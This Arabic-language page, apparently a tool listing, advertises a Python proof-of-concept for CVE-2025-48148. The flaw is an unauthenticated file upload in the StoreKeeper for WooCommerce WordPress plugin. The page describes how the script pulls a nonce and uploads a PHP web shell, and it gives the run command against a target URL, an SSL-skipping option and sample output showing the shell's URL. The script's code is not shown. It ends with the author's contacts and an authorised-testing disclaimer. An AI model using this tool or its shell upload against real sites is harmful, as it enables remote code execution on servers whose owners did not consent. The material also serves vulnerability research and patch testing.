
StoreKeeper for WooCommerce <= 14.4.4 - رفع ملفات تعسفي دون مصادقة
StoreKeeper for WooCommerce <= 14.4.4 - رفع ملفات عشوائي غير مصادق عليه
إضافة StoreKeeper for WooCommerce في ووردبريس معرضة لثغرة رفع ملفات عشوائية بسبب عدم التحقق من نوع الملف في جميع الإصدارات حتى الإصدار 14.4.4 وما يشملها.
يسمح هذا للمهاجمين غير المصادقين برفع ملفات عشوائية إلى خادم الموقع المتأثر، مما قد يؤدي إلى تنفيذ أكواد عن بُعد.
اسم السكربت: CVE-2025-48148.py
هذا السكربت عبارة عن برهان اختراق احترافي (Proof-of-Concept) لـ CVE-2025-48148، مصمم لأتمتة عملية رفع ويب شيل إلى مواقع ووردبريس المتأثرة باستخدام إضافة StoreKeeper for WooCommerce.
nonce المطلوب مباشرة من رابط الهدف، مما يضمن الموثوقية حتى لو تغيرت القيمة.python3 CVE-2025-48148.py -u "http://target.com/wordpress/"
خيارات إضافية:
--debug تفعيل المخرجات التفصيلية.--insecure تخطي التحقق من شهادة SSL.مثال:
[*] Extracting nonce...
[+] Nonce extracted: 66e372c7e0
[+] Shell file created: shell.php
[*] Uploading shell...
[+] Upload response:
{"success":true,"data":{"url":"http://target.com/wp-content/uploads/shell.php"}}
📧 البريد الإلكتروني: [email protected]
📨 تيليجرام: @Kxploit
هذا السكربت مقدم لأغراض تعليمية واختبار الاختراق المصرح به فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة. احصل دائمًا على إذن مناسب قبل اختبار أي نظام.
بواسطة: Nxploited ( Khaled Alenazi )